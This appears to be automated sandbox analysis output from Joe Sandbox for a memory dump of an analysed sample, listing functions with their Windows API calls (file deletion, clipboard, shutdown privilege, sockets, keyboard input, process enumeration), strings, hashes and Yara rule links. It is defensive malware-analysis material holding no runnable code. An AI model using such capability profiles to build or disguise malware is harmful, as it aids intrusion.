Instruction Fuzzy Hash: 3D31C13150021D6EDF20EFB8EC48AEF77ACFF46320F144166E990E2290EB75DA448A60

Function 0083D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2

Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A

FindFirstFileW.KERNEL32(?,?), ref: 0083D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0083D1DD
MoveFileW.KERNEL32(?,?), ref: 0083D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D237

Part of subcall function 0083D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0083D21C,?,?), ref: 0083D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0083D253
FindClose.KERNEL32(00000000), ref: 0083D264

Strings

\*.*, xrefs: 0083D0CD, 0083D0D6, 0083D0EB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 06c4cb1131c08085e1cb009dec62ad4f4e05b1ca615494c4367d24bf2b23032d
Instruction ID: c1aa8041f561ecfd89cf4e23ec0cd236cfe36389a55c57c87894a328c1898d27
Opcode Fuzzy Hash: 06c4cb1131c08085e1cb009dec62ad4f4e05b1ca615494c4367d24bf2b23032d
Instruction Fuzzy Hash: F0613C3190120DABCF05EBA0EA969EEB775FF95300F244166E401B7291EB356F09DBA1

Function 0084ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0084ED91
EmptyClipboard.USER32 ref: 0084ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0084EDAC
CloseClipboard.USER32 ref: 0084EEA3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
Instruction ID: 9cec8e701ecd85be1d62378af440ab80dd1f89095cecefd56f97fd6d78eafea3
Opcode Fuzzy Hash: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
Instruction Fuzzy Hash: 8B418B35604615AFE720DF19E888B29BBA1FF44318F158099E85ACB762C775EC41CB90

Function 0083E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A

ExitWindowsEx.USER32(?,00000000), ref: 0083E932

Strings

@, xrefs: 0083E925
, xrefs: 0083E95C
, xrefs: 0083E920
SeShutdownPrivilege, xrefs: 0083E902

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
Instruction ID: 379666924c19bfdf065b0fd50170b64fff082f54eba15025f36d60c6faa0577e
Opcode Fuzzy Hash: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
Instruction Fuzzy Hash: 5401F972710215ABEF5426B89C8AFBF765CF794754F154422FC13F21D1E6A45C4083D1

Function 00851204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00851276
WSAGetLastError.WSOCK32 ref: 00851283
bind.WSOCK32(00000000,?,00000010), ref: 008512BA
WSAGetLastError.WSOCK32 ref: 008512C5
closesocket.WSOCK32(00000000), ref: 008512F4
listen.WSOCK32(00000000,00000005), ref: 00851303
WSAGetLastError.WSOCK32 ref: 0085130D
closesocket.WSOCK32(00000000), ref: 0085133C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: e9a19b9f7a1b17e5fd6ea8f9cdaf18b7ad64f20ac364a5e7163247104a601886
Instruction ID: f2bb445bf73d04a56512cdb37e5d3832b0d3f402ff33684807dbceb7e7b58ccd
Opcode Fuzzy Hash: e9a19b9f7a1b17e5fd6ea8f9cdaf18b7ad64f20ac364a5e7163247104a601886
Instruction Fuzzy Hash: 9C418D316001019FDB20DF24C489B69BBE6FF86319F198199E8568F392C775EC85CBE1

Function 0080B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0080B9D4
_free.LIBCMT ref: 0080B9F8
_free.LIBCMT ref: 0080BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00873700), ref: 0080BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,008A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0080BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,008A1270,000000FF,?,0000003F,00000000,?), ref: 0080BC36
_free.LIBCMT ref: 0080BD4B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: a1849c5afa1bb939a06cdcff8382b714d891e07c8c914a7c6fdeec7f63ccc7c8
Instruction ID: 66a09eb365a5d98313458225933a1b6a6ffbfa6e7150f60f9de21983bc3c6bfe
Opcode Fuzzy Hash: a1849c5afa1bb939a06cdcff8382b714d891e07c8c914a7c6fdeec7f63ccc7c8
Instruction Fuzzy Hash: 27C13771A04219AFDB60DF789C55BAABBB8FF42320F2441AAE590D72D1EB309E41C751

Function 0083D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2

Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A

FindFirstFileW.KERNEL32(?,?), ref: 0083D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D481
FindClose.KERNEL32(00000000), ref: 0083D498
FindClose.KERNEL32(00000000), ref: 0083D4A1

Strings

\*.*, xrefs: 0083D3F2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: f1b7f0e229cf99e01d3cea985178135ba267cb275331b73b8735315f9be4a4dd
Instruction ID: 2c1898a76e689f0ede28de73162994bc09726b02229fd7f67f54c7b54194fec8
Opcode Fuzzy Hash: f1b7f0e229cf99e01d3cea985178135ba267cb275331b73b8735315f9be4a4dd
Instruction Fuzzy Hash: D5318E71008345ABC301EF64D8958AFB7B8FE91304F444A1EF4D593291EB34AA09DBA7

Function 0084648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008464DC
CoInitialize.OLE32(00000000), ref: 00846639
CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 00846650
CoUninitialize.OLE32 ref: 008468D4

Strings

.lnk, xrefs: 008464BA, 00846524, 008465E0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 223cdfbf5013badf418e4acea9446bb749725fff575881df914eefd1d3a332af
Instruction ID: 80a2e88f23bebe74134af34423df60cd23762be87f7a38fca4fda88372808b19
Opcode Fuzzy Hash: 223cdfbf5013badf418e4acea9446bb749725fff575881df914eefd1d3a332af
Instruction Fuzzy Hash: 98D13871508205AFC314EF24C885A6BB7E8FF95704F04496DF595CB2A1EB74ED05CBA2

Function 008522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 008522E8

Part of subcall function 0084E4EC: GetWindowRect.USER32(?,?), ref: 0084E504

GetDesktopWindow.USER32 ref: 00852312
GetWindowRect.USER32(00000000), ref: 00852319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00852355
GetCursorPos.USER32(?), ref: 00852381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008523DF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: dd811813dc75a6d15ad87015a478ba55d419951e2dac5898f1fb24cd52b6377d
Instruction ID: 3eba9c1bbbaa65fdafecf6e8fe9526d5dc02de25ba656a1ae219989dfab41ef4
Opcode Fuzzy Hash: dd811813dc75a6d15ad87015a478ba55d419951e2dac5898f1fb24cd52b6377d
Instruction Fuzzy Hash: AB31BE72504315AFDB20DF58C849BABBBA9FF85314F00091DF985D7291DB74EA09CB92

Function 00849B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00849B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00849C8B

Part of subcall function 00843874: GetInputState.USER32 ref: 008438CB
Part of subcall function 00843874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00849BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00849C75

Strings

*.*, xrefs: 00849B5D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: dcebac55b7bfae996bfabfa287f26d7f962bad4bad1efaf50219229e86f340ef
Instruction ID: 87a596699e9272591298dbbffd114675e2a6dc86fa03bf78a95a4d4678695dc9
Opcode Fuzzy Hash: dcebac55b7bfae996bfabfa287f26d7f962bad4bad1efaf50219229e86f340ef
Instruction Fuzzy Hash: CF415E7194420EAFCF24DF64C989AEEBBB8FF05310F244156E955E2291EB349E44CF61

Function 007E997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 007E9A4E
GetSysColor.USER32(0000000F), ref: 007E9B23
SetBkColor.GDI32(?,00000000), ref: 007E9B36

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 2ec4b7e7950e70f2898d3ec89f3a627a778a8b53094a4a907abcb56ce2d1b7cc
Instruction ID: db82daf8bec88c327c88fe52283e11647e797cab7a1ee377bb5474b877ce712d
Opcode Fuzzy Hash: 2ec4b7e7950e70f2898d3ec89f3a627a778a8b53094a4a907abcb56ce2d1b7cc
Instruction Fuzzy Hash: FCA13C7210A5A4BEE7249A3F9C5CD7B365DFF4A304F158129F702C6AD1CA2D9D41C272

Function 00851806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0085185D
WSAGetLastError.WSOCK32 ref: 00851884
bind.WSOCK32(00000000,?,00000010), ref: 008518DB
WSAGetLastError.WSOCK32 ref: 008518E6
closesocket.WSOCK32(00000000), ref: 00851915

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 2d1f4ec01169df6f5e532ec3b9ac5b38a9b493c49563cab27d6dfc3ba7ad7341
Instruction ID: 4e8ac390515b94d189bfcf9b6da71fef3e33e1cdd7920de9c68ff8bd4db148fe
Opcode Fuzzy Hash: 2d1f4ec01169df6f5e532ec3b9ac5b38a9b493c49563cab27d6dfc3ba7ad7341
Instruction Fuzzy Hash: 3151C575A00200AFDB20AF24C88AF6A77E5EB49718F488059F9469F3C3D775AD41CBE1

Function 00861C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00861CC0
IsWindowEnabled.USER32 ref: 00861CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00861CDB
IsIconic.USER32 ref: 00861CE9
IsZoomed.USER32 ref: 00861CF7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: aa57d7458f2f8e652d1d54e0e74fe7d758ac3636358617abca19e5c006be3910
Instruction ID: d7b476685c5036323670efa49097e54a96110d3657607d406b4f57230eb82c94
Opcode Fuzzy Hash: aa57d7458f2f8e652d1d54e0e74fe7d758ac3636358617abca19e5c006be3910
Instruction Fuzzy Hash: DB21D3317406119FDB218F1AC848B6A7BA5FF95315F1E9059E846CB352CBB1DC42CB90

Function 0085A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0085A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0085A6BA

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0085A79C
CloseHandle.KERNEL32(00000000), ref: 0085A7AB

Part of subcall function 007ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00813303,?), ref: 007ECE8A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 78d78a8347176de5a607402c4c929828362c4d6fdc30a02fce4480541497eaf3
Instruction ID: ec0196fc160b5efc5a98d68b565118446e13228d187ddfddd41e23352c7f7aaf
Opcode Fuzzy Hash: 78d78a8347176de5a607402c4c929828362c4d6fdc30a02fce4480541497eaf3
Instruction Fuzzy Hash: 07513971508340AFD314EF25C886A6BBBF8FF89754F00491EF98597291EB74E904CB92

Function 0083AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0083AAAC
SetKeyboardState.USER32(00000080), ref: 0083AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0083AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0083AB88

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
Instruction ID: 1c4dd50867b670278d92aee27b406b60f581e98524990bf9f8bdccb7228a09e0
Opcode Fuzzy Hash: c1289621ef6fc8113d81879dd83dc121cbc19f26e1caf4e89d24fb9a0006d99e
Instruction Fuzzy Hash: 9F31F731A40248AEEF298A64CC05BFAB7A6FBD4320F04421AE1C1D61D1D3758981C7E3

Function 00845C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00845CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00845D17
FindClose.KERNEL32(?), ref: 00845D5F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 45552b19aebc2779fc3259a5dc818d5b596229b5995f4b88f7c971394500ae6c
Instruction ID: b9c2d6032b809a8e616c88f3b18d6dbe58550f374d975ec3ebb6f8c0026b76e9
Opcode Fuzzy Hash: 45552b19aebc2779fc3259a5dc818d5b596229b5995f4b88f7c971394500ae6c
Instruction Fuzzy Hash: B351AA74A04A05DFC714DF28C498A9AB7E4FF49314F14856EE99ACB3A2DB34ED04CB91

Function 00802622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0080271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00802724
UnhandledExceptionFilter.KERNEL32(?), ref: 00802731

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
Instruction ID: eb77e74e7a962f30dde7360b37ceb807e1fed58abaa9952aaf2971939729646c
Opcode Fuzzy Hash: 32fe3c9c3b58d90935250429582a91193bf055638e3b9bf807ad768213ce3228
Instruction Fuzzy Hash: C631C27591121CABCB21DF68DD88798BBB8BF08310F5041EAE91CA63A1E7749F818F44

Function 008451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008451DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00845238
SetErrorMode.KERNEL32(00000000), ref: 008452A1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

